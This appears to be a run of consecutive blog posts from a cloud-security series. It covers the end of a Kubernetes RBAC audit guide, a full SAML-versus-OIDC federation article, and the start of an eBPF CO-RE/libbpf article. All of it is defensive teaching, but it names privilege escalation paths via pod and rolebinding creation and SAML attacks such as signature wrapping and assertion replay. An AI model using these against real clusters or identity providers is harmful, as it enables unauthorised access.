The annotation on the Kubernetes ServiceAccount is the bridge:

apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789012:role/AppBackendRole

Kubernetes RBAC controls what the pod can do inside the cluster. The IAM role controls what the pod can do in AWS. Both must be explicitly granted; neither inherits from the other.

GKE Workload Identity

apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    iam.gke.io/gcp-service-account: [email protected]

AKS Workload Identity

apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    azure.workload.identity/client-id: "MANAGED_IDENTITY_CLIENT_ID"
---
apiVersion: v1
kind: Pod
metadata:
  labels:
    azure.workload.identity/use: "true"
spec:
  serviceAccountName: app-backend

RBAC Audit — What to Check First

# Start here: who has cluster-admin?
kubectl get clusterrolebindings -o json | \
  jq '.items[] | select(.roleRef.name=="cluster-admin") | 
      {binding: .metadata.name, subjects: .subjects}'
# cluster-admin should bind to almost nobody — review every result

# Find ClusterRoles with wildcard permissions
kubectl get clusterroles -o json | \
  jq '.items[] | select(.rules[]?.verbs[]? == "*") | .metadata.name'

# What can the default SA do in each namespace?
for ns in $(kubectl get namespaces -o name | cut -d/ -f2); do
  echo "=== $ns ==="
  kubectl auth can-i --list --as=system:serviceaccount:${ns}:default -n ${ns} 2>/dev/null \
    | grep -v "no" | head -10
done

# What can a specific SA do?
kubectl auth can-i --list \
  --as=system:serviceaccount:production:app-backend \
  -n production

# Check whether an SA can escalate — key risk indicators
kubectl auth can-i get secrets -n production \
  --as=system:serviceaccount:production:app-backend
kubectl auth can-i create pods -n production \
  --as=system:serviceaccount:production:app-backend
kubectl auth can-i create rolebindings -n production \
  --as=system:serviceaccount:production:app-backend

Creating pods and creating rolebindings are privilege escalation primitives. A service account that can create pods can run a pod with a different, more powerful SA. A service account that can create rolebindings can grant itself more permissions.

Useful Tools

# rbac-tool — visualize and analyze RBAC (install: kubectl krew install rbac-tool)
kubectl rbac-tool viz                              # generate a graph of all bindings
kubectl rbac-tool who-can get secrets -n production
kubectl rbac-tool lookup [email protected]

# rakkess — access matrix for a subject
kubectl rakkess --sa production:app-backend

# audit2rbac — generate minimal RBAC from audit logs
audit2rbac --filename /var/log/kubernetes/audit.log \
  --serviceaccount production:app-backend

Common RBAC Misconfigurations

Misconfiguration Risk Fix
cluster-admin bound to application SA Full cluster takeover from compromised pod Minimal ClusterRole; scope to namespace where possible
list or wildcard on secrets Read all secrets in scope — includes credentials, API keys Grant get on specific named secrets only
default SA with non-trivial permissions Every pod in the namespace inherits the permission Bind permissions to dedicated SAs; automountServiceAccountToken: false on default
ClusterRoleBinding for namespace-scoped work Namespace work with cluster-wide permission Always prefer RoleBinding; ClusterRoleBinding only for genuinely cluster-wide needs
Binding users by username string Hard to revoke; doesn’t sync with IdP Bind groups from IdP; revocation propagates through group membership
SA can create pods or create rolebindings Privilege escalation path Audit and remove these from non-privileged SAs

Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 5 — Identity and Access Management Kubernetes RBAC operates as a full IAM system at the platform layer, independent of cloud IAM
CISSP Domain 3 — Security Architecture Two independent authorization layers (cloud + K8s) must each be designed and audited — one does not compensate for the other
ISO 27001:2022 5.15 Access control Kubernetes RBAC Roles, ClusterRoles, and bindings implement access control within the container platform
ISO 27001:2022 5.18 Access rights Service account provisioning, OIDC-based human access, and workload identity integration with cloud IAM
ISO 27001:2022 8.2 Privileged access rights cluster-admin and wildcard RBAC bindings represent the highest-privilege grants in Kubernetes
SOC 2 CC6.1 Kubernetes RBAC is the access control mechanism for the container platform layer in CC6.1
SOC 2 CC6.3 Binding revocation, SA token disabling, and OIDC group-based access removal satisfy CC6.3 requirements

Key Takeaways

  • Kubernetes RBAC and cloud IAM are separate authorization layers — both must be secured; strong cloud IAM with weak K8s RBAC is still a vulnerable cluster
  • cluster-admin bindings are the first thing to audit in any cluster — the blast radius of a compromised pod with cluster-admin is the entire cluster
  • Disable automountServiceAccountToken on service accounts and pods that don’t call the Kubernetes API — most application pods don’t need it
  • Use OIDC for human access rather than client certificates; revocation via IdP is instant and reliable
  • Bind groups from IdP rather than individual usernames; revocation propagates automatically when someone leaves
  • A service account that can create pods or create rolebindings is a privilege escalation path — audit for these in every namespace

What’s Next

EP12 is the capstone: Zero Trust IAM — how all the concepts in this series come together into an architecture that assumes nothing is implicitly trusted, verifies everything explicitly, and limits blast radius through least privilege enforced at every layer.

Next: Zero trust access in the cloud

Get EP12 in your inbox when it publishes → linuxcent.com/subscribe

SAML vs OIDC: Which Federation Protocol Belongs in Your Cloud?

Reading Time: 10 minutes

Meta Description: Choose between SAML vs OIDC federation for your cloud — understand token formats, trust flows, and which protocol fits your IdP and workload mix.


What Is Cloud IAMAuthentication vs AuthorizationIAM Roles vs PoliciesAWS IAM Deep DiveGCP Resource Hierarchy IAMAzure RBAC ScopesOIDC Workload IdentityAWS IAM Privilege EscalationAWS Least Privilege AuditSAML vs OIDC Federation


TL;DR

  • Federation means downstream systems trust the IdP’s signed assertion — they never see credentials and don’t manage them independently
  • SAML is XML-based, browser-oriented, the enterprise standard; OIDC is JWT-based, API-native, the modern protocol for workload identity and consumer SSO
  • In OIDC trust policies, the sub condition is the security boundary — omitting it means any GitHub Actions workflow in any repository can assume your role
  • Validate all JWT claims: signature, iss, aud, exp, sub — libraries do this, but need correct configuration (especially aud)
  • The IdP is the trust anchor: compromise the IdP and every downstream system is compromised. Treat IdP admin access with the same controls as your most sensitive system.
  • JIT provisioning and Conditional Access extend federation from “who are you” to “are you in an appropriate context right now”

The Big Picture

  FEDERATION: HOW TRUST FLOWS FROM IdP TO DOWNSTREAM SYSTEMS

  Identity Provider  (Okta / Entra ID / Google / AD FS)
  ┌──────────────────────────────────────────────────────────────────┐
  │  User or workload authenticates → IdP issues signed assertion   │
  │                                                                  │
  │  ┌──────────────────────────┐  ┌───────────────────────────┐   │
  │  │  SAML Assertion (XML)    │  │  OIDC ID Token (JWT)       │   │
  │  │  RSA-signed, 5–10 min    │  │  RS256-signed, ~1 hr      │   │
  │  │  Audience: SP entity ID  │  │  aud: client ID           │   │
  │  │  Subject: user identity  │  │  sub: specific workload   │   │
  │  └───────────┬──────────────┘  └──────────┬────────────────┘   │
  └─────────────────────────────────────────────────────────────────┘
                 │  human SSO                  │  workload identity
                 ▼                             ▼
  ┌─────────────────────────┐  ┌───────────────────────────────────┐
  │ SP validates signature  │  │ AWS STS / GCP STS validates       │
  │ + audience + timestamp  │  │ signature + iss + aud + sub       │
  │ → console session       │  │ → AssumeRoleWithWebIdentity       │
  └─────────────────────────┘  └───────────────────────────────────┘

  Security bound: IdP security bounds every system that trusts it
  Disable in Okta → access revoked everywhere that trusts Okta

Introduction

Before federation existed, every system had its own user database. Your Jira account. Your AWS account. Your Salesforce account. Your internal wiki. Each one had its own password, its own MFA, its own offboarding process. When an engineer joined, someone had to create accounts in every system. When they left, you hoped whoever processed the offboarding remembered to deactivate all of them.

I’ve done that audit — the one where you’re trying to figure out if a former employee still has access to anything. You go system by system, cross-reference against HR records, find accounts that exist in places you’ve forgotten the company even uses. In one environment I found an ex-engineer’s account still active in a vendor portal six months after they left, because that system was set up by someone who had since also left the company, and nobody had documented it.

Federation solves this structurally. One identity provider. One place to authenticate. One place to revoke. Every downstream system trusts the IdP’s assertion rather than managing credentials independently. Disable someone in Okta and they lose access everywhere that trusts Okta — immediately, without a checklist.

This episode is how federation actually works at the protocol level, because understanding the mechanism is what lets you design it securely. A federation setup with a trust policy that accepts assertions from any OIDC issuer is worse than no federation — it’s a false sense of security.


The Federation Model

Identity Provider (IdP)          Service Provider (SP) / Relying Party
  (Okta, Google, AD FS, Entra ID)       (AWS, Salesforce, GitHub, your app)
         │                                          │
         │  1. User authenticates to IdP             │
         │     (password + MFA)                      │
         │                                          │
         │  2. IdP generates a signed assertion      │
         │     (SAML response or OIDC ID Token)      │
         │ ──────────────────────────────────────── ▶│
         │                                          │
         │  3. SP validates the signature            │
         │     (using IdP's public certificate       │
         │      or JWKS endpoint)                    │
         │  4. SP maps identity to local permissions │
         │  5. SP grants access                      │

The SP never sees the user’s password. It never has one. It trusts the IdP’s cryptographic signature — if the assertion is signed with the IdP’s private key, and the SP trusts that key, the identity is accepted.

This trust chain has one critical property: the security of every SP is bounded by the security of the IdP. Compromise the IdP, and every system that trusts it is compromised. This is why IdP security deserves the same attention as the most sensitive system it gates access to.


SAML 2.0 — The Enterprise Standard

SAML (Security Assertion Markup Language) is XML-based, verbose, and battle-tested. Published in 2005, it’s the protocol behind most enterprise SSO deployments. When your company says “use your corporate login for this vendor app,” SAML is usually the mechanism.

How a SAML Login Flows

1. User visits AWS console (the Service Provider)
2. AWS checks: no active session → redirect to IdP
   → https://company.okta.com/saml?SAMLRequest=...
3. Okta authenticates the user (password, MFA)
4. Okta generates a SAML Assertion — a signed XML document containing:
   - Who the user is (Subject, typically email)
   - Their attributes (group memberships, custom attributes)
   - When the assertion was issued and when it expires (valid 5-10 minutes typically)
   - Which SP this is for (Audience restriction)
   - Okta's digital signature (RSA-SHA256 or similar)
5. Browser POSTs the assertion to AWS's ACS (Assertion Consumer Service) URL
6. AWS validates the signature against Okta's public cert (retrieved from Okta's metadata URL)
7. AWS reads the SAML attribute for the IAM role
8. AWS calls sts:AssumeRoleWithSAML → issues temporary credentials
9. User gets a console session — no AWS credentials were ever stored anywhere

What a SAML Assertion Actually Looks Like

<saml:Assertion>
  <saml:Issuer>https://okta.company.com</saml:Issuer>

  <saml:Subject>
    <saml:NameID>[email protected]</saml:NameID>
  </saml:Subject>

  <saml:AttributeStatement>
    <!-- This attribute tells AWS which IAM role to assume -->
    <saml:Attribute Name="https://aws.amazon.com/SAML/Attributes/Role">
      <saml:AttributeValue>
        arn:aws:iam::123456789012:role/EngineerRole,arn:aws:iam::123456789012:saml-provider/OktaProvider
      </saml:AttributeValue>
    </saml:Attribute>
  </saml:AttributeStatement>

  <!-- Critical: time bounds on this assertion -->
  <saml:Conditions NotBefore="2026-04-11T09:00:00Z" NotOnOrAfter="2026-04-11T09:05:00Z">
    <saml:AudienceRestriction>
      <!-- Critical: this assertion is ONLY valid for AWS -->
      <saml:Audience>https://signin.aws.amazon.com/saml</saml:Audience>
    </saml:AudienceRestriction>
  </saml:Conditions>

  <ds:Signature>... RSA-SHA256 signature over the above ...</ds:Signature>
</saml:Assertion>

The Audience restriction and the NotOnOrAfter timestamp are two of the most security-critical fields. The audience ensures this assertion can’t be reused for a different SP. The timestamp ensures it can’t be replayed after expiry.

Setting Up SAML Federation with AWS

# Register Okta as a SAML provider in AWS IAM
aws iam create-saml-provider \
  --saml-metadata-document file://okta-metadata.xml \
  --name OktaProvider

# Create the IAM role that federated users will assume
aws iam create-role \
  --role-name EngineerRole \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {
        "Federated": "arn:aws:iam::123456789012:saml-provider/OktaProvider"
      },
      "Action": "sts:AssumeRoleWithSAML",
      "Condition": {
        "StringEquals": {
          "SAML:aud": "https://signin.aws.amazon.com/saml"
        }
      }
    }]
  }'

# In Okta: configure the AWS IAM Identity Center app
# Attribute mapping: https://aws.amazon.com/SAML/Attributes/Role
# Value: arn:aws:iam::123456789012:role/EngineerRole,arn:aws:iam::123456789012:saml-provider/OktaProvider

# Set maximum session duration (8 hours is reasonable for human access)
aws iam update-role \
  --role-name EngineerRole \
  --max-session-duration 28800

SAML Attack Surface

Attack What It Does Why It Works Prevention
XML Signature Wrapping (XSW) Attacker inserts a malicious assertion, wraps it around the legitimate signed one; some SPs validate the wrong element SAML’s XML structure is complex; naive signature validation checks the signed element, not the element the SP reads Use a vetted SAML library — never hand-roll parsing
Assertion replay Steal a valid assertion (e.g., via network intercept) and replay it before NotOnOrAfter If the SP doesn’t track used assertion IDs, the same assertion can be used multiple times Short expiry; SP tracks seen assertion IDs
Audience bypass SP doesn’t verify the Audience field An assertion issued for SP A can be used at SP B Always validate Audience matches your SP entity ID

XML Signature Wrapping is the most interesting attack historically — it was how security researchers demonstrated SAML implementations in AWS, Google, and others could be bypassed before vendors patched their libraries. The lesson: SAML is complex enough that rolling your own parser is asking for a vulnerability.


OpenID Connect (OIDC) — The Modern Protocol

OIDC is JSON-based, REST-native, and designed for the web and API-first world. Built on top of OAuth 2.0, it’s the protocol behind “Sign in with Google,” GitHub’s OIDC tokens for Actions, and workload identity federation across cloud providers.

Token Anatomy

An OIDC ID Token is a JWT — three base64-encoded parts separated by dots:

Header.Payload.Signature

Header:
{
  "alg": "RS256",           ← signing algorithm
  "kid": "key-id-123"       ← which key signed this (for JWKS rotation)
}

Payload (the claims):
{
  "iss": "https://accounts.google.com",         ← who issued this token
  "sub": "108378629573454321234",               ← stable user identifier (not email)
  "aud": "my-app-client-id",                   ← who this token is for
  "exp": 1749600000,                           ← expires at (Unix timestamp)
  "iat": 1749596400,                           ← issued at
  "email": "[email protected]",
  "email_verified": true,
  "hd": "company.com"                          ← hosted domain (Google Workspace)
}

Signature: RSA-SHA256(base64(header) + "." + base64(payload), idp_private_key)

The relying party (your application, or AWS STS) validates the signature using the IdP’s public keys — available at the JWKS endpoint (/.well-known/jwks.json). The signature verification proves the token was issued by the expected IdP and hasn’t been tampered with since.

The Full OIDC Token Exchange (GitHub Actions → AWS)

# GitHub Actions automatically provides an OIDC token in the runner environment
# The token contains: iss=token.actions.githubusercontent.com, repo, ref, sha, run_id, etc.

# Step 1: Fetch the OIDC token from GitHub's token service
TOKEN=$(curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" \
  "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=sts.amazonaws.com" | jq -r '.value')

# Step 2: Present to AWS STS for exchange
aws sts assume-role-with-web-identity \
  --role-arn arn:aws:iam::123456789012:role/GitHubActionsRole \
  --role-session-name github-deploy \
  --web-identity-token "${TOKEN}"

# STS performs these validations:
# 1. Fetch GitHub's JWKS: https://token.actions.githubusercontent.com/.well-known/jwks
# 2. Verify signature is valid
# 3. Verify iss = "token.actions.githubusercontent.com" (matches OIDC provider)
# 4. Verify aud = "sts.amazonaws.com"
# 5. Verify sub matches the trust policy condition
# 6. Verify exp is in the future

The trust policy condition on the IAM role is what prevents any GitHub repository from assuming this role:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "Federated": "arn:aws:iam::123456789012:oidc-provider/token.actions.githubusercontent.com"
    },
    "Action": "sts:AssumeRoleWithWebIdentity",
    "Condition": {
      "StringEquals": {
        "token.actions.githubusercontent.com:aud": "sts.amazonaws.com",
        "token.actions.githubusercontent.com:sub": "repo:my-org/my-repo:ref:refs/heads/main"
      }
    }
  }]
}

The sub condition is the security boundary. repo:my-org/my-repo:ref:refs/heads/main means: only runs triggered from the main branch of my-org/my-repo can assume this role. A pull request from a fork, a run from a different repo, or a run from a different branch — all get a different sub claim and the assumption fails.

I’ve reviewed trust policies that omit the sub condition and just check aud. That means any GitHub Actions workflow — in any repository, owned by anyone — can assume that role. That’s not a misconfiguration to be theoretical about: public GitHub repositories exist, and they can trigger GitHub Actions.

OIDC Validation Checklist

Every application that validates OIDC tokens must check all of these:

✓ Signature valid (using IdP's JWKS endpoint — not a hardcoded key)
✓ iss matches the expected IdP URL
✓ aud matches your application's client ID (not just "any audience")
✓ exp is in the future
✓ nbf (not before), if present, is in the past
✓ iat is recent (within your clock skew tolerance)
✓ For workload identity: sub is pinned to the specific workload

Skipping aud validation is the most common mistake. A token issued for application A with aud: app-a-client-id should not be accepted by application B. Without audience validation, any application in your system that can obtain a token for the IdP can reuse it at any other application. Libraries like python-jose and jsonwebtoken validate aud by default — but they need to be configured with the expected audience value.


Enterprise Federation Patterns

Multi-Account AWS with IAM Identity Center + Okta

The pattern I deploy in every multi-account AWS environment:

Okta (IdP)
  └── IAM Identity Center
        ├── Account: prod     → Permission Sets: ReadOnly, DevOps
        ├── Account: staging  → Permission Sets: Developer  
        ├── Account: shared   → Permission Sets: NetworkAdmin, SecurityAudit
        └── Account: sandbox  → Permission Sets: Admin (sandbox only)
# Engineers access accounts through Identity Center portal
aws configure sso
# Prompts: SSO start URL, region, account, role

aws sso login --profile prod-readonly

# List available accounts and roles (useful for tooling and scripts)
aws sso list-accounts --access-token "${TOKEN}"
aws sso list-account-roles --access-token "${TOKEN}" --account-id "${ACCOUNT_ID}"

# Get temporary credentials for a specific account/role
aws sso get-role-credentials \
  --account-id "${ACCOUNT_ID}" \
  --role-name ReadOnly \
  --access-token "${TOKEN}"

When an engineer is offboarded from Okta, they lose access to every AWS account immediately. No individual IAM user deletion across 20 accounts. No access key hunting. One action in Okta, complete revocation.

Just-in-Time (JIT) Provisioning

Rather than creating user accounts in every downstream system ahead of time, JIT provisioning creates accounts on first login:

  1. User authenticates to IdP
  2. SAML/OIDC assertion includes group memberships and attributes
  3. SP receives assertion, checks if a user account exists for this sub
  4. If not: create the account with attributes from the assertion
  5. Grant access based on group claims
  6. On subsequent logins: update the account’s attributes if claims changed

The security property: when a user is disabled in the IdP, their account in downstream systems becomes inaccessible even if the account object still exists. There’s nothing to log in with. JIT accounts don’t survive IdP deletion — they’re inactive shells that produce no risk.


The IdP Is the Trust Anchor — Protect It Accordingly

The entire security of a federated system is bounded by the security of the IdP. If an attacker can log into Okta as an admin, they can issue valid SAML assertions for any user, for any role, to any SP that trusts Okta. Every downstream system is compromised simultaneously.

This is not theoretical. In the 2023 Caesars and MGM Resorts attacks, initial access was achieved through social engineering against identity provider support — not through technical exploitation of cloud infrastructure. Once identity infrastructure is compromised, everything downstream follows.

What this means practically:

  • MFA for all IdP admin accounts — hardware FIDO2 keys, not TOTP. TOTP codes can be phished in real-time. Hardware keys cannot.
  • PIM / JIT access for IdP configuration changes — no standing admin access
  • Separate monitoring and alerting for IdP admin activity
  • Audit who can modify SAML/OIDC configurations and attribute mappings in the IdP — these are the levers for privilege escalation
  • Narrow audience restrictions — configure which SPs can receive assertions; don’t create a wildcard IdP configuration that serves all SPs

Conditional Access — Adding Context to Federation

Modern IdPs support Conditional Access policies that restrict when assertions are issued:

// Entra ID Conditional Access: require MFA + compliant device for AWS access
{
  "conditions": {
    "applications": {
      "includeApplications": ["AWS-Application-ID-in-Entra"]
    },
    "users": {
      "includeGroups": ["all-employees"]
    },
    "locations": {
      "excludeLocations": ["NamedLocation-CorporateNetwork"]
    }
  },
  "grantControls": {
    "operator": "AND",
    "builtInControls": ["mfa", "compliantDevice"]
  }
}

This policy: when an employee accesses AWS from outside the corporate network, they must use MFA on a device that MDM has verified as compliant. From inside the network, the policy still applies but the named location exclusion can relax certain requirements.

Conditional Access is how you move beyond “authenticated to IdP” as the only gate. Device health, network location, risk score — these become inputs to the access decision.


Framework Alignment

Framework Reference What It Covers Here
CISSP Domain 5 — Identity and Access Management Federation is the mechanism for extending identity trust across organizational boundaries
CISSP Domain 3 — Security Architecture Trust relationships must be explicitly designed; overly broad federation trust is an architectural failure
ISO 27001:2022 5.19 Information security in supplier relationships Federation with third-party IdPs and SPs establishes a cross-organizational trust boundary that must be governed
ISO 27001:2022 8.5 Secure authentication SAML and OIDC are the secure authentication protocols for federated access — token validation requirements
ISO 27001:2022 5.17 Authentication information Credential lifecycle in federated systems — no passwords distributed to SPs; IdP manages authentication
SOC 2 CC6.1 Federated identity is the access control mechanism for human access to cloud environments in CC6.1
SOC 2 CC6.6 Logical access from outside system boundaries — federation with external IdPs and partner organizations

Key Takeaways

  • Federation means downstream systems trust the IdP’s signed assertion — they never see credentials and don’t need to manage them independently
  • SAML is XML-based, browser-oriented, widely supported for enterprise SSO; OIDC is JWT-based, API-friendly, the protocol for modern workload identity and consumer SSO
  • In OIDC, the sub condition in trust policies is what prevents any workload from assuming any role — omitting it is a critical misconfiguration
  • Validate all JWT claims: signature, iss, aud, exp, sub — libraries do this, but they need correct configuration
  • The IdP is the trust anchor — its security posture bounds the security of every system that trusts it. Treat IdP admin access with the same controls as your most sensitive systems.
  • JIT provisioning and Conditional Access extend federation from “who are you” to “are you in an appropriate context right now”

What’s Next

EP11 brings this into Kubernetes — RBAC, service account tokens, and how the Kubernetes authorization layer interacts with cloud IAM. Two separate systems, both requiring security. A gap in either becomes a gap in both.

Next: Kubernetes RBAC and AWS IAM

Get EP11 in your inbox when it publishes → linuxcent.com/subscribe

CO-RE and libbpf — Write Once, Run on Any Kernel

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 6
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf**


TL;DR

  • Kernel structs change between releases — hardcoded offsets break across patch versions, not just major releases
  • BTF embeds full type information in the kernel at /sys/kernel/btf/vmlinux; CO-RE uses it to patch field accesses at load time
    (BTF = BPF Type Format — a compact description of every struct, field, and byte offset in the running kernel, built into the kernel image)
  • vmlinux.h, generated from BTF, replaces all kernel headers with a single file committed to your repository
  • BPF_CORE_READ() is the CO-RE macro — every kernel struct access in a portable program goes through it
  • libbpf skeleton generation (bpftool gen skeleton) eliminates manual fd management for map and program lifecycle
  • For production tools: libbpf + CO-RE. For one-off debugging: bpftrace. For prototyping: BCC.

eBPF CO-RE (Compile Once, Run Everywhere) solves the kernel portability problem — the reason Cilium and Falco survive kernel upgrades without recompilation. What maps assumed — quietly — is that the kernel structs those programs read look the same tomorrow as they do today. They don’t. The Linux kernel has no stable ABI for internal data structures. task_struct, sk_buff, sock — the fields eBPF programs read constantly — can shift between patch releases, not just major versions. I learned this the hard way when a routine upgrade from 5.15.0-89 to 5.15.0-91 — two patch revisions — silently broke a custom tracer I’d been running in production for six months.


Six months after deploying a custom eBPF tracer for a client — it detected specific syscall patterns that Falco’s default ruleset didn’t cover — they ran a routine Ubuntu patch upgrade. Not a major kernel version jump. 5.15.0-89 to 5.15.0-91. Two patch revisions.

The tracer stopped loading. The error was invalid indirect read from stack. I opened the program source: nothing remotely like an indirect read. The program was a straightforward tracepoint handler, maybe 40 lines of C.

Three hours of debugging led to a four-byte offset difference. The struct task_struct had a field alignment change between the two patch versions. My program accessed ->comm at a hardcoded byte offset. On 5.15.0-89 that offset was 0x620. On 5.15.0-91 it was 0x624. The verifier caught the misalignment — correctly — and rejected the program.

I had compiled the eBPF bytecode against a fixed kernel header snapshot. The binary was not portable. Every time the kernel moved a struct field, the tool broke.

CO-RE is the solution to this.

Quick Check: Does Your Cluster Support CO-RE?

Two commands — check whether your nodes have the BTF support that CO-RE tools require:

# SSH into a worker node, then:
ls -la /sys/kernel/btf/vmlinux && echo "BTF available — CO-RE tools will work"

Expected output on a supported node:

-r--r--r-- 1 root root 4956234 Apr 21 00:00 /sys/kernel/btf/vmlinux
BTF available — CO-RE tools will work

If the file is missing: CO-RE tools (Cilium, Falco, Tetragon) will fall back to legacy BCC compilation mode — which requires a full compiler toolchain and kernel headers installed on every node.

# Confirm the kernel was built with BTF enabled
cat /boot/config-$(uname -r) | grep CONFIG_DEBUG_INFO_BTF
# CONFIG_DEBUG_INFO_BTF=y  ← required for CO-RE

Common results by platform:
| Platform | BTF available? |
|———-|—————-|
| Ubuntu 20.04+ (kernel 5.4+) | ✓ Yes |
| EKS managed nodes (AL2023) | ✓ Yes |
| GKE managed nodes (kernel 5.10+) | ✓ Yes |
| Amazon Linux 2 (older kernels) | ✗ No — BCC fallback |
| RHEL 7 / CentOS 7 | ✗ No |

Why Kernel Structs Change and Why It Matters

The Linux kernel has no stable ABI for internal data structures. task_struct, sock, sk_buff, file — the structs that eBPF programs read constantly — change between releases.

ABI (Application Binary Interface) is the contract that says a compiled binary built against version N will still work against version N+1 without recompilation. The Linux kernel maintains a stable ABI for syscalls (open(), read(), connect()) but makes no such guarantee for internal structs. Fields move, get added, get renamed between patch releases — and any program with hardcoded offsets silently breaks. Field additions, reordering, alignment changes, struct embedding changes. The kernel developers are under no obligation to preserve internal layouts, and they don’t.

Before CO-RE, eBPF programs dealt with this in two ways:

BCC (BPF Compiler Collection) — compile the eBPF C code at runtime on the target host, using that system’s kernel headers. No portability problem because compilation happens on the machine you’re deploying to. Cost: you need a full compiler toolchain, kernel headers, and Python runtime on every production node. Startup time in seconds. Container image size in hundreds of MB. For a security tool that should be lightweight and fast-starting, this is a non-starter.

Per-kernel compiled binaries — ship different builds for each supported kernel version, detect at runtime, load the matching binary. Falco maintained this model for years. The operational overhead is significant: a matrix of kernel × distro × version with separate build and test pipelines for each combination.

CO-RE is the third option. Compile once on a build machine, and let libbpf patch struct field accesses at load time on the target system, using type information embedded in the running kernel.

BTF: The Type System That Makes CO-RE Possible

BTF (BPF Type Format) is compact type debug information embedded directly into the kernel image. Since Linux 5.2, kernels built with CONFIG_DEBUG_INFO_BTF=y expose their full type information at /sys/kernel/btf/vmlinux.

# Verify BTF is available
ls -la /sys/kernel/btf/vmlinux

# Inspect the BTF for a specific struct
bpftool btf dump file /sys/kernel/btf/vmlinux format raw | grep -A 5 'task_struct'

# See the actual field offsets the running kernel uses
bpftool btf dump file /sys/kernel/btf/vmlinux format c | grep -A 20 'struct task_struct {'

BTF encodes every struct definition with field names, types, and byte offsets. When libbpf loads an eBPF program compiled with CO-RE relocations, it reads both the BTF the program was compiled against (embedded in the .bpf.o file) and the BTF of the running kernel. If task_struct->comm has moved, libbpf patches the field access instruction before loading the program.

This patching happens at load time, transparently, without modifying the binary you shipped.

CO-RE relocation is the mechanism behind this. When a CO-RE program is compiled, it embeds metadata saying “I need the offset of comm inside task_struct” rather than hardcoding 0x620. At load time, libbpf reads this relocation, looks up the real offset from the running kernel’s BTF, and patches the instruction. For operators: this is why Cilium and Falco survive kernel upgrades without you reinstalling them.

Most distribution kernels now ship with BTF enabled:

# Ubuntu 20.04+ (kernel 5.4+)
cat /boot/config-$(uname -r) | grep CONFIG_DEBUG_INFO_BTF
# CONFIG_DEBUG_INFO_BTF=y

# Check at runtime
file /sys/kernel/btf/vmlinux
# /sys/kernel/btf/vmlinux: symbolic link to /sys/kernel/btf/vmlinux

Amazon Linux 2023, Ubuntu 22.04, Debian 11+, RHEL 8.2+, and most cloud-provider-managed kernels have BTF. The notable exception: RHEL 7 and Amazon Linux 2 on older kernels.

The CO-RE Toolchain

The build pipeline for a CO-RE eBPF program:

Development machine:
  vmlinux.h (generated from kernel BTF)
       ↓
  myprog.bpf.c ──── clang -target bpf -g ────→ myprog.bpf.o
  (CO-RE relocations embedded in BTF section)
       ↓
  bpftool gen skeleton myprog.bpf.o ─────────→ myprog.skel.h
       ↓
  myprog.c (userspace) ── gcc ──→ myprog
  (statically links libbpf, skeleton handles load/attach/cleanup)

Target machine (any kernel with BTF, 5.4+):
  ./myprog
  ↓ libbpf reads /sys/kernel/btf/vmlinux
  ↓ patches field accesses to match current kernel struct layout
  ↓ verifier validates patched program
  ↓ program loads and runs

One binary. Any supported kernel. No compiler on the target system.

vmlinux.h — One Header to Replace Them All

Before CO-RE, eBPF C programs included dozens of kernel headers — linux/sched.h, linux/net.h, linux/fs.h, linux/socket.h — and they had to match the exact kernel version you were targeting.

vmlinux.h is generated from the BTF of a running kernel. It contains every struct, enum, typedef, and macro definition the kernel exposes through BTF — in a single file, without any compile-time kernel dependency.

# Generate vmlinux.h from the running kernel
bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h

# Typical size
wc -l vmlinux.h
# 350000+

You commit vmlinux.h to your repository, generated from a representative kernel. CO-RE handles the actual layout differences at load time on whatever kernel you deploy to. The file is large but you only generate it once and update it when you add support for a new kernel generation.

In your eBPF C source:

#include "vmlinux.h"           // replaces all kernel headers
#include <bpf/bpf_helpers.h>   // eBPF helper functions
#include <bpf/bpf_tracing.h>   // tracing macros
#include <bpf/bpf_core_read.h> // CO-RE read macros

How CO-RE Fixes the Offset Problem

The mechanism is worth understanding once, even if you’re not writing eBPF programs.

When a CO-RE eBPF program accesses a kernel struct field, it doesn’t hardcode the byte offset. Instead, it records a relocation — “I need the offset of pid inside task_struct” — in the compiled binary. When libbpf loads the program, it resolves each relocation by looking up the field in the running kernel’s BTF and patches the access instruction to use the correct offset for this specific kernel.

This is why my four-byte problem happened: the tracer I’d compiled wasn’t using CO-RE. It hardcoded 0x620 as the offset of task_struct->comm. When the kernel moved it to 0x624, the program accessed the wrong memory, the verifier caught the misalignment, and the load failed. A CO-RE rewrite would have resolved comm‘s offset at load time from BTF and never known the difference.

The relocation model also handles fields that don’t exist on older kernels. If a program accesses a field added in kernel 5.15 and the running kernel is 5.10, libbpf can either skip the access (returning a zero value) or fail the load — depending on how the program marks the field access. This is how tools ship support for features across a kernel version range without separate builds.

What CO-RE Means for Tools You Already Run

This is why you care about CO-RE even if you’re never going to write an eBPF program yourself.

Falco, Cilium, Tetragon, and Pixie all ship as single binaries or container images. You install them on a Ubuntu 22.04 node, a RHEL 9 node, and an Amazon Linux 2023 node — three different kernel versions, three different task_struct layouts — and the same binary works on all of them. Before CO-RE, Falco maintained pre-compiled kernel probes for every supported kernel version in a matrix of distro × kernel × version. The probe list had thousands of entries. A kernel your distro shipped between Falco release cycles meant a gap in coverage until the next release.

With CO-RE, there’s one binary. libbpf reads the running kernel’s BTF at load time, patches the field accesses to match the actual struct layout, and the verifier checks the patched program. The tool vendor doesn’t need to know about your specific kernel. You don’t need to wait for a probe release.

The constraint is BTF availability. Check your nodes:

# Quick check — if this file exists, CO-RE tools work
ls /sys/kernel/btf/vmlinux

# Full confirmation
cat /boot/config-$(uname -r) | grep CONFIG_DEBUG_INFO_BTF
# CONFIG_DEBUG_INFO_BTF=y  ← required

